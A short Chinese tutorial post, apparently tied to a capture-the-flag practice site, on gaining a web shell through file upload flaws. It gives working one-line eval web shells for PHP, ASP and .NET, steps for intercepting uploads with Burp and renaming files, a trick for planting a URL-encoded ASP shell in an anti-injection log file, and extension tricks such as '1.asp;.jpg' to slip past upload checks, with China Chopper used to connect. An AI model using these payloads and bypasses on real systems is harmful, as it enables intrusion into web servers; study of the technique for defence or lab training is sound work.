【Web】内部文件上传系统漏洞分析溯源(获取shell)
【准备工具】
1.中国菜刀 (可以去官网下载)
官网:http://www.maicaidao.co/ (不建议使用)
https://download.csdn.net/download/u014549283/10570976
2.BurpPro
3.火狐浏览器的FoxyProxy Standard插件
【技术要点】
1.新建一句话代码,比如1.txt,内容选择如下
PHP: <?php @eval($_POST[‘pass’]);?>
ASP: <%eval request(“pass”)%>
.NET: <%@ Page Language=”Jscript”%><%eval(Request.Item[“pass”],”unsafe”);%>
在实际使用过程中,替换PASS为链接的时候需要的密码。(pass是后面菜刀链接时候编辑框网址后面的内容)
2.截包,改上传文件名称,获取最后的路径
3.菜刀连接即可,注意其中的参数填写!
【access通用防注入】(asp为例)
1文件记录在sqlin.asp文件 中,我们在可注入的php的参数中 加上
?id=1 and 1=<%eval request(“pass”)%>
发现无法记录,于是将一句话木马进行url编码
(在线URL编码 http://tool.oschina.net/encode?type=4)
即id=1 and 1=%3C%25eval%20request(%22pass%22)%25%3E
记录成功,然后用菜刀连接sqlin.asp即可。
【模式2】
对于index.php?t=upload.php这种上传后有路径提示的
菜刀连接的格式如下
index.php?t=upload/1.php
【模式3】
原题https://www.mozhe.cn/bug/detail/cVNveEMvWDA2aHMydDNYNkJmUVdPUT09bW96aGUmozhe
上传cer文件(内容为一句话木马),然后用菜刀连接。
【上传SHELL绕过检测】
1.例如asp马,可以把文件后缀名改为 1.asp;jpg 或者1.asp;.jpg 或者 1.asp;0jpg
还没有评论,来说两句吧...